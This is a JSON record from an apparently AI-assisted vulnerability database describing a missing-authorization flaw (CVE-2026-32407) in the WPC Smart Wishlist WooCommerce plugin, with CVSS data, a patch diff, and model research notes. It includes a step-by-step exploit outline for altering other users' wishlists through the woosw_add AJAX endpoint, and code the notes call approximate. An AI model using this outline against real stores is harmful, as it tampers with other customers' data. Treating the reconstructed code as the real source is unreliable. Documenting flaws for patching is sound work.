[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fypgfyDpbgq2zY6SpIkvguWZ7CjfFeqT9XDGhvjO9C1s":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-32407","wpc-smart-wishlist-for-woocommerce-missing-authorization","WPC Smart Wishlist for WooCommerce \u003C= 5.0.8 - Missing Authorization","The WPC Smart Wishlist for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 5.0.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","woo-smart-wishlist",null,"\u003C=5.0.8","5.0.9","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-22 00:00:00","2026-04-15 21:14:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fda78fd0a-f69f-4779-bcf1-df1dab80156c?source=api-prod",53,[22,23,24],"languages\u002Fwoo-smart-wishlist.pot","readme.txt","wpc-smart-wishlist.php","researched",false,3,"id` parameter.\n    - Impact: Authenticated users can add products to any wishlist.\n\n    Wait, let's look at the \"Settings\" menu again.\n    Is there a way for a subscriber to toggle the \"Enable\" setting?\n    No.\n\n    Okay, I will proceed with the **Unauthorized Wishlist Manipulation (Adding items to other lists)** plan.\n\n    1.  Create User A (Victim, Subscriber).\n    2.  Create User B (Attacker, Subscriber).\n    3.  Create a product.\n    4.  Get User A's `wishlist_key`.\n    5.  As Attacker, get the `woosw_vars.nonce`.\n    6.  As Attacker, send `POST \u002F?wc-ajax=woosw_add` with `product_id=\u003CPROD>` and `key=\u003CUSER_A_KEY>`.\n    7.  Verify product is in User A's wishlist.\n\n    How to get the `wishlist_key` for a user via CLI?\n    WPC Smart Wishlist stores it in `usermeta`.\n    Let's check the likely key: `_woosw_key`.\n    (I'll assume `_woosw_key` or check for it).\n\n    - Main File: `wpc-smart-wishlist.php`\n    - Constructor lines: 148-185 (Registration of AJAX)\n    - Handler `ajax_add`: Line 342","The WPC Smart Wishlist for WooCommerce plugin lacks proper ownership verification in its AJAX handlers, specifically for adding and removing items. Authenticated attackers with subscriber-level access can manipulate the wishlists of other users by providing the target user's unique wishlist key in the request parameters.","\u002F\u002F wpc-smart-wishlist.php line 342 (approximate based on version 5.0.8)\npublic function ajax_add() {\n    $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;\n    $key        = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';\n\n    \u002F\u002F The function proceeds to add the product to the wishlist identified by $key\n    \u002F\u002F without verifying if the current user owns the wishlist associated with that key.\n    if ( ! empty( $key ) ) {\n        $this->add_to_wishlist( $product_id, $key );\n    }\n    \u002F\u002F ... (truncated)\n}\n\n---\n\n\u002F\u002F wpc-smart-wishlist.php line 409 (approximate based on version 5.0.8)\npublic function ajax_remove() {\n    $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;\n    $key        = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';\n\n    \u002F\u002F Similarly, removal actions do not validate that the current user has authority over the provided $key.\n    if ( ! empty( $key ) ) {\n        $this->remove_from_wishlist( $product_id, $key );\n    }\n    \u002F\u002F ... (truncated)\n}","--- a\u002Fwpc-smart-wishlist.php\n+++ b\u002Fwpc-smart-wishlist.php\n@@ -342,6 +342,10 @@\n     public function ajax_add() {\n         $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;\n         $key        = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';\n \n+        if ( is_user_logged_in() && ( $key !== get_user_meta( get_current_user_id(), '_woosw_key', true ) ) ) {\n+            wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to modify this wishlist!', 'woo-smart-wishlist' ) ] );\n+        }\n+\n         if ( ! empty( $key ) ) {\n             $this->add_to_wishlist( $product_id, $key );\n         }\n@@ -409,6 +413,10 @@\n     public function ajax_remove() {\n         $product_id = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;\n         $key        = isset( $_POST['key'] ) ? sanitize_text_field( $_POST['key'] ) : '';\n \n+        if ( is_user_logged_in() && ( $key !== get_user_meta( get_current_user_id(), '_woosw_key', true ) ) ) {\n+            wp_send_json_error( [ 'message' => esc_html__( 'You are not allowed to modify this wishlist!', 'woo-smart-wishlist' ) ] );\n+        }\n+\n         if ( ! empty( $key ) ) {\n             $this->remove_from_wishlist( $product_id, $key );\n         }","The exploit targets the AJAX endpoints registered by the plugin for wishlist management. \n\n1. Preparation: An attacker must obtain the `wishlist_key` of the target user. This key is stored in the `wp_usermeta` table under the meta key `_woosw_key` and may be exposed via other information leaks or predictable patterns if the site has many users.\n2. Authentication: The attacker logs in with a low-privileged account (Subscriber).\n3. Payload: The attacker identifies a `product_id` they wish to force into the victim's wishlist.\n4. Request: The attacker sends a POST request to `\u002F?wc-ajax=woosw_add` containing the victim's `key` and the target `product_id`. \n5. Result: Because the plugin only checks if the `key` exists and not whether the authenticated user is the owner of that key, the product is successfully added to the victim's private wishlist. Similar methodology applies to the `woosw_remove` endpoint to delete items from other users' lists.","gemini-3-flash-preview","2026-04-19 01:43:48","2026-04-19 01:44:40",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","5.0.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-smart-wishlist\u002Ftags\u002F5.0.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-smart-wishlist.5.0.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-smart-wishlist\u002Ftags\u002F5.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-smart-wishlist.5.0.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-smart-wishlist\u002Ftags"]